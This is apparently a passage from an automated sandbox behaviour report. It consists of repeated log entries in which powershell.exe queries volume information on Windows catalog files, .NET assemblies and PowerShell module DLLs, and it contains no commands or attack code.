                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
